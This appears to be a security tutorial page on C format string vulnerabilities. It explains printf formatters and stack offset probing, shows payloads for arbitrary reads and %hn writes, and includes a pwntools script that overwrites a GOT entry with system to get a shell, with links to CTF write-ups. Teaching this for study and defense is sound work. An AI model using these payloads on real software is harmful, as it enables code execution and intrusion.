Format Strings
Basic Information
In C, printf is a function that prints a string. Its first parameter is the format string: raw text containing formatters. The remaining parameters are the values substituted for those formatters.
The vulnerability appears when attacker-controlled text is used as the first argument to this function. The attacker can craft input that abuses the printf format string capabilities to read and write data at any readable or writable address, which can lead to arbitrary code execution.
Formatters:
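%08x -> 8 hex digits (4 bytes), zero-padded
%d -> Signed integer
%u -> Unsigned integer
%s -> String
%n -> Writes the number of bytes printed so far to the address given by the argument
%hn -> Same as %n, but writes 2 bytes instead of 4
%<n>$x -> Direct access, Example: ("%3$d", var1, var2, var3) -> Access to var3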
Examples:
- Vulnerable example:
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
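- Normal use: every formatter has a matching argument. For example, printf("%x %x %x", a, b, c) with three int variables prints all three in hex.
- With missing arguments: printf("%x %x %x", a) supplies only one value, so the other two formatters print whatever lies in the next argument positions on the stack.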
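The difference between these cases can be modelled without a C compiler. The sketch below is a toy model, not glibc's printf: `toy_printf` and the `stack` list are hypothetical names, and the stack values are made up. It only illustrates that each formatter consumes the next slot whether or not the caller supplied an argument for it.

```python
import re

def toy_printf(fmt, stack):
    """Expand %x and %<n>$x against a list standing in for the stack slots."""
    next_slot = 0  # slot used by the next non-positional %x

    def expand(match):
        nonlocal next_slot
        position = match.group(1)
        if position is not None:
            index = int(position) - 1  # %<n>$x is 1-based
        else:
            index = next_slot
            next_slot += 1
        return format(stack[index], "x")

    return re.sub(r"%(?:(\d+)\$)?x", expand, fmt)

# Hypothetical stack: one intended argument followed by unrelated data.
stack = [0x4b5, 0xdeadbeef, 0x8048000, 0x41414141]

print(toy_printf("%x", stack))         # 4b5
print(toy_printf("%x %x %x", stack))   # 4b5 deadbeef 8048000
print(toy_printf("%4$x", stack))       # 41414141
```

The second call is the "missing arguments" case: only the first slot was meant to be printed, yet the two extra formatters expose the neighbouring slots.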
Accessing Pointers
The format %<n>$x, where n is a number, tells printf to select the n-th parameter (from the stack). So to read the 4th parameter from the stack you could use printf("%x %x %x %x"), which prints the first through the fourth parameter, or printf("%4$x"), which reads the fourth directly.
Notice that the attacker controls the printf format parameter, which basically means that the input is on the stack when printf is called, so specific memory addresses can be written onto the stack.
[!CAUTION] An attacker controlling this input can place arbitrary addresses on the stack and make printf access them. The next section explains how to use this behaviour.
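Before an address placed in the input can be used, its position on the stack has to be known. A common way to find it is to send a marker followed by a run of positional %p formatters and look for the marker in the output. The sketch below builds such a probe and parses a reply. `build_probe` and `find_offset` are hypothetical helper names, and `sample` is a made-up reply for a 32-bit target, not output from a real program.

```python
def build_probe(marker=b"AAAA", count=8):
    """Return the marker followed by %1$p.%2$p. ... so each slot is labelled by position."""
    specs = b".".join(b"%" + str(i).encode() + b"$p" for i in range(1, count + 1))
    return marker + b"." + specs

def find_offset(output, marker=b"AAAA"):
    """Return the 1-based slot whose value equals the marker read as a little-endian pointer."""
    wanted = hex(int.from_bytes(marker, "little")).encode()
    fields = output.split(b".")[1:]  # drop the echoed marker itself
    for position, field in enumerate(fields, start=1):
        if field.strip() == wanted:
            return position
    return None

probe = build_probe(count=6)
# Made-up reply: slot 4 holds "AAAA", slots 5 and 6 hold the next bytes of the probe.
sample = b"AAAA.0xffffd0a0.0x40.0xf7fb5580.0x41414141.0x2431252e.0x32252e70"

print(probe)                # b'AAAA.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p'
print(find_offset(sample))  # 4
```

In this made-up reply the input starts at position 4, so an address placed in the input can be reached with a positional formatter counted from there.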
Arbitrary Read
It's possible to use the formatter %n$s to make printf take the address stored in the n-th position, follow it, and print the data there as a string (printing until a 0x00 byte is found). So if the base address of the binary is 0x8048000 and we know that the user input starts at the 4th position on the stack, the start of the binary can be printed with:
from pwn import *

p = process('./bin')

payload = b'%6$s'           # 4th param: print the string at the address held in the 6th param
payload += b'xxxx'          # 5th param: padding so the format text fills 8 bytes
payload += p32(0x8048000)   # 6th param: the address to read from

p.sendline(payload)
log.info(p.clean())         # b'\x7fELF\x01\x01\x01||||'
[!CAUTION] Note that you cannot put the address 0x8048000 at the beginning of the input, because the string would be cut at the 0x00 byte contained in that address.
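The layout and the 0x00 problem can be checked without pwntools. The sketch below assumes a 32-bit little-endian target with 4-byte stack slots, and an input function that copies NUL bytes into the buffer. `build_read_payload` and `seen_by_printf` are hypothetical helper names. It uses %s, as the text describes, so the address is dereferenced rather than printed.

```python
import struct

def build_read_payload(address, input_slot=4):
    """Build '%<k>$s' + padding + address for a 32-bit target."""
    # Formatter plus padding fill two slots, so the address lands in input_slot + 2.
    spec = b"%" + str(input_slot + 2).encode() + b"$s"
    if len(spec) > 8:
        raise ValueError("formatter does not fit in two 4-byte slots")
    return spec.ljust(8, b"x") + struct.pack("<I", address)

def seen_by_printf(payload):
    """Return the part printf parses as format text: everything before the first NUL."""
    return payload.split(b"\x00", 1)[0]

payload = build_read_payload(0x8048000)
address_first = struct.pack("<I", 0x8048000) + b"%4$s"

print(payload)                        # b'%6$sxxxx\x00\x80\x04\x08'
print(seen_by_printf(payload))        # b'%6$sxxxx'
print(seen_by_printf(address_first))  # b''
```

With the address first, printf sees an empty format string, which is why the address goes after the formatter.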
Arbitrary Write
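The formatter %<num>$n writes the number of bytes printed so far to the address held in the <num> parameter on the stack. An attacker who controls how many characters printf emits can therefore make %<num>$n write an arbitrary number to an arbitrary address.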
Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter %.<num-write>x%<num>$n prints <num-write> characters and then writes the total number of characters printed so far to the address pointed to by the <num> position.
AAAA%.6000d%4\$n -> Write 6004 to the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
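The count in the first line can be reproduced with Python's % operator, which follows the same precision rule for integers as C: a precision of N pads the number with zeros to at least N digits. This is only an illustration of the arithmetic. `emitted` is a hypothetical helper and the value 1 stands in for whatever argument the formatter would consume.

```python
def emitted(fmt, value=1):
    """Number of characters a C-style format prints before the write formatter is reached."""
    return len(fmt % value)

print(emitted("AAAA%.6000d"))  # 6004: 4 literal characters + 6000 digits
print(emitted("%.9999d"))      # 9999, produced by a 7-character formatter
print(len("%.9999d"))          # 7
```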
However, note that to write a value such as the address 0x08049724 (which is a HUGE number to write at once), %hn is usually used instead of %n. It writes only 2 bytes, so the operation is done twice: once for the highest 2 bytes of the value and once for the lowest 2 bytes.
Therefore, this vulnerability allows writing anything to any writable address (arbitrary write).
In this example, the goal is to overwrite the address of a function in the GOT that will be called later, although other arbitrary-write-to-exec techniques could be abused instead:
{{#ref}} ../arbitrary-write-2-exec/ {{#endref}}
We are going to overwrite a function that receives its arguments from the user and point it to the system function.
As mentioned, writing the address usually takes 2 steps: you first write 2 bytes of the address and then the other 2. To do so, %hn is used.
- HOB denotes the 2 higher-order bytes of the address
- LOB denotes the 2 lower-order bytes of the address
Then, because the count written by %hn only grows as more output is printed, you need to write the smaller of [HOB, LOB] first and then the other one.
If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn
If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn
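Fields, in order: HOB address, LOB address, HOB_shellcode-8, param number of the HOB address, LOB_shellcode-HOB_shellcode, param number of the LOB address
python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x" + b"%4$hn" + b"%.15408x" + b"%5$hn" + b"\n")'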
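The two templates can be folded into one small builder. The sketch below mirrors the layout above for a 32-bit little-endian target. `build_hn_payload` is a hypothetical helper, not a pwntools function, and it assumes that neither address contains a 0x00 byte and that both addresses are printed before any padding. It rejects padding values between 1 and 7, because %.Nx prints more than N characters when the consumed value has more than N hex digits.

```python
import struct

def build_hn_payload(target, value, offset):
    """Two-%hn payload writing the 32-bit value to target.

    offset is the stack position of the first address in the input.
    """
    hob, lob = value >> 16, value & 0xFFFF
    # Position offset holds target+2 (receives HOB); offset+1 holds target (receives LOB).
    writes = sorted([(hob, offset), (lob, offset + 1)])  # smaller count first
    payload = struct.pack("<I", target + 2) + struct.pack("<I", target)
    written = 8  # the two addresses are printed before any padding
    for half, position in writes:
        pad = half - written
        if pad < 0 or 0 < pad < 8:
            raise ValueError("count not reachable with this simple layout")
        if pad:
            payload += f"%.{pad}x".encode()
        payload += f"%{position}$hn".encode()
        written = half
    return payload

# Values taken from the one-liner above: write 0xbffffc2f to 0x08049724.
print(build_hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

For the values of the one-liner this yields the same bytes: 0xbfff (49151) is the smaller half, so it is written first with 49151 - 8 = 49143 characters of padding, followed by 0xfc2f - 0xbfff = 15408 more.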
Pwntools Template
You can find a template for preparing an exploit for this kind of vulnerability in:
{{#ref}} format-strings-template.md {{#endref}}
Or this basic example from here:
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

# 5 is the stack position of the input; replace printf's GOT entry with system
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')          # the next printf call on user input now reaches system

p.interactive()
Other Examples & References
- https://ir0nstone.gitbook.io/notes/types/stack/format-string
- https://www.youtube.com/watch?v=t1LH9D5cuK4
- https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
- 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32 bit, relro, no canary, nx, no pie, format string to overwrite the address of fflush with the win function (ret2win)
- https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
- 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in .fini_array (so the flow loops back one more time) and to write the address of system into the GOT entry of strlen. When the flow goes back to main, strlen is called with user input and, since it now points to system, it executes the passed commands.